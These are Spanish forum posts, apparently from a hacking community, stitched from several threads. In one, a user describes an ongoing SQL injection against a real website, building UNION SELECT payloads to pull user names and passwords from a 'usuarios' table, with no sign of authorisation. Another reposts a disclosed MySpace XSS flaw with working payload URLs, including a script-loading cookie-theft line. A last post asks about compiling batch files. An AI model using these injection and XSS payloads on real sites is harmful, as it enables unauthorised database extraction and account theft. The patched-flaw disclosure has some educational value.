Atrancada!
Los nombres de columna id y usuario los saqué probando al azar, pero ahroa encesito saber los otros nombre de columnas para sacar mas datos como el password estoy buscando métodos para sacar los nombres de las otras columnas

He intentado usar funciones q me saken nombres 
....information_schema.tables where table_schema...
Pero estos me devuelven el error Access denied for user: 'qaw148@%' to database 'information_schema'
Hay funciones como column, column_name q no  me son validos
Y también he probado por caminos como select disctinct, o concatenando lso campos, pero nada solo obtengo los valores de id y usuario. Por favor el mejor camino para sacar los nombres de las columnas, he probado también con un sbstr( para ir sacando el nombre pero creoq  no he montado bien la orden siempre me muestra error.   Necesito ayuda esto engancha demasiado jajajaj saludos

ok me autorespondo es eso tenia q averiguar q numero de columana es usuario es el 4 y ya me salen palabritas.
Volvere con mas dudas gracias

OK muchas gracias, q no creí de llegar a 22 columnas con nul, ahora he creadolas instrucciones sabioendo q tiene 22 columnas

UNION SELECT usuario, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM usuarios where id=1/*

Esto me saca una pagina buena osea q la instrucción esta bien, ¿ pero no me debería mostrar el valor de usuario para id = 1?

 UNION SELECT MIN(id),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM usuarios WHERE usuario = 'hyhsjsu'
Aquí intento provocar un error al aginar al id un usuario q no es, pero me sale una pagina buena . y no me tira error. ésto significa que la tabla está vacía??

¿ debo sacar la posicion dela columna usuario en la tabla para resolver esto? osea para probar instrucciones estilo null, usuario, o null, null, usuario. Ayuda sirdarckcat porfa,

HOla
alguien con más experiencia q me ayude un pokito que mhe quedado atrancada
en una base de datos mysqld-4.0.18-nt

POr inyecciones he sacado una tabla usuarios y dos columnas id y usuario.
yla inyección se encuentra tras un ?id=15
Aquí hago un UNION y le meto esto : SELECT usuario FROM usuarios where id=1/*
en total ?id=15 UNION SELECT usuario FROM usuarios where id=1/*
Me lanza el error The used SELECT statements have a different number of columns.
Es decir que me faltan columnas los relleno con NULL pero eso no me resuelve el problema, ¿está el eror al unir con el uNION y usar una columna de diferente tipo?.

Algun posible camino para continuar gracias.

no sé a q tipo te refieres si es  a MOndo o MUstachio desde luego momby, es un pryecto donde participaron grandes, como Rsnake (ha.ckers.org), Mustlive o Awesome Andrew

Bissuus 

Sap eso pone al principio del tema
aquí está el momby aunque ya ha terminado y  las más importantes corregidas , pero ene l ultimo del dia 30 aparece el popurrí y algunas aun vann
A pàrte se muestras XSS y formas de evadirlos muy interesantess
BIssos
 
MOMBY:

http://sni-labs.com/MOMBY/

Ha sido corregida

XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG

Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.

Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> &quot;&gt; o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.

Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG

Imagen inyección

XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1

ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1

Fuente http://sni-labs.com

Buenas, hace tiempo hice un batch para una tonteria del registro , y lo vi tan fácil y poderoso q me piqué , y claro empecé a complicar los bats y eso.... joder todo iba bien
todo está en ms2, jjaja pero no todo era gloria , lo primero q te das cuenta es q no es lo mismo hacerlos en w98/95 qu en xp , nt, me , 2K , ya que unos tienen comandos q faltan en otros y claro eso te descuadra, a parte si haces un bat pa 98 date cuenta q si usas un comando q no ta en xp pos no ira ,
otro problema es al pasarlos a exe o com , en com no suelen dar problemas,pero a exe ya sea usando el  bat2exe o batchexe creas exes q al final no pueden ser usados directamente debes crearles accesos y otras cosas , vaya los bat simlpes de call *.exe o  los bat de una linea y un comando son simples y suelen poder pasarse a exes facil no dan problemas, bueno no m enrrollo más .. Todo esto era porque si alguien pudiera decirme de un compilador de batch o formas de introducir viejos o nuevos comandos en la version de ms2 q uses, aclarar q esto ultimo lo lei en inglés pero no llegue a enterarme y alfinal no sabia si hablaban de eso o de otra cosa, EA pos muchas gracias , habre dicho barbaridades y retonterias ,q quieren soy novata, ah y no vale eso de compila en c/c++ (se supone que ya se)
cuidense... y respondan porfavor